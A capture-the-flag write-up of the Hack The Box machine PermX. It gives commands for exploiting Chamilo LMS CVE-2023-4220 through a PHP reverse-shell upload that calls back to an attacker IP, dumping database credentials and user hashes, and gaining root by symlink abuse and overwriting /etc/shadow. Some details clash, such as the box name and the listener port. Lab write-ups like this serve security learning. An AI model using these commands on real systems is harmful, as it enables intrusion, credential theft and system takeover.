Post

HTB - PermX

Posted
Hack the Box - PermX.
Hack the Box - PermX.
By racc0x
2 min read

Box Info

NameBizness
Release Date20 Jun, 2024
OSLinux
Rated DifficultyEasy

Enumeration

Nmap

Image

whatweb:

Image

Wappalyzer

Image

Web

Image

Brute Forcing directory

I use

1

dirsearch -u http://permx.htb/

but i dont find anything interesting, So i use the Scan for Subdomain

SubDomain

1

wfuzz -c -w /usr/share/wordlists/amass/subdomains-top1mil-5000.txt --hc 400,403,404,302 -H "Host: FUZZ.permx.htb" -u http://permx.htb -t 100

Image

Search for chamilo in google.

Chamilo LMS - CVE-2023-4220

Image

RCE:

1

echo '<?php system("bash -c 'bash -i >& /dev/tcp/10.10.10.13/9001 0>&'"); ?>' > rce.php

1
2

curl -F 'bigUploadFile=@rce.php' 'http://<chamilo>/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'
`The file has successfully been uploaded.`

1
2

curl 'http://<chamilo>/main/inc/lib/javascript/bigupload/files/rce.php'
`uid=33(www-data) gid=33(www-data) groups=33(www-data)`

Image

We go to open the file through web.

Image

Execute the file .php http://lms.permx.htb//main/inc/lib/javascript/bigupload/files/rce.php with lvwrap nc -lvnp 7777 listening for get the reverse shell

Image

taadaaa… Well, we login as www-data and we go to enumerate… I found in config folder a file configuration.php and show it us a user and password.

Till now we have one user:chamilo and password:03f6lY3uXAP2....

Image

netstat -nlp or netstat -ano and we see one port strange and is port 3306 it is open for the database.

Image

Use the mysql inside in the victim machine.

1

mysql -uchamilo -p and the password 03F6lY3uXAP2bkW8

Image

1
2
3
4

show databases;
use chamilo;
describe user;
select user_id,username,firstname,lastname,password,salt from user;

Image

We login with ssh mtz@permx.htb and password 03F6lY3uXAP2bkW8

Image

sudo -l

Image

The directory /etc/init.d is home to scripts for System V init (SysVinit), the classic Linux service management system. It includes scripts to start, stop, restart, and sometimes reload services. These can be executed directly or through symbolic links found in /etc/rc?.d/. An alternative path in Redhat systems is /etc/rc.d/init.d.

Its main function is to change all file permissions, but it must be in the /home/mtz directory.

Image

Symlink Español Symlink Hacktricks

1
2

link soft / to cc
ln -s / cc

Create a folder that points to the root path with Symlink with the -s (soft) option to locate ourselves inside it and make changes to /etc/shadow (root password) with a password that we create ourselves (cccc).

Image

The /etc/shadow storage the password of root

1

sudo /opt/acl.sh mtz rwx /home/mtz/etc/shadow (execute the script for change the permissions)

Image

Generated a password for remplace the root password in /etc/shadow

1

openssl passwd -6 cccc

Image

and copy and paste en the file "shadow"

1

echo 'root: {password generate}:19871:0:99999:7:::' > /home/mtz/cc/etc/shadow

Login as root with password cccc

Image

Root

hackthebox, PermX
HackTheBox Chamilo LMS CVE-2023-4220 mysql symlink curl
This post is licensed under CC BY 4.0 by the author.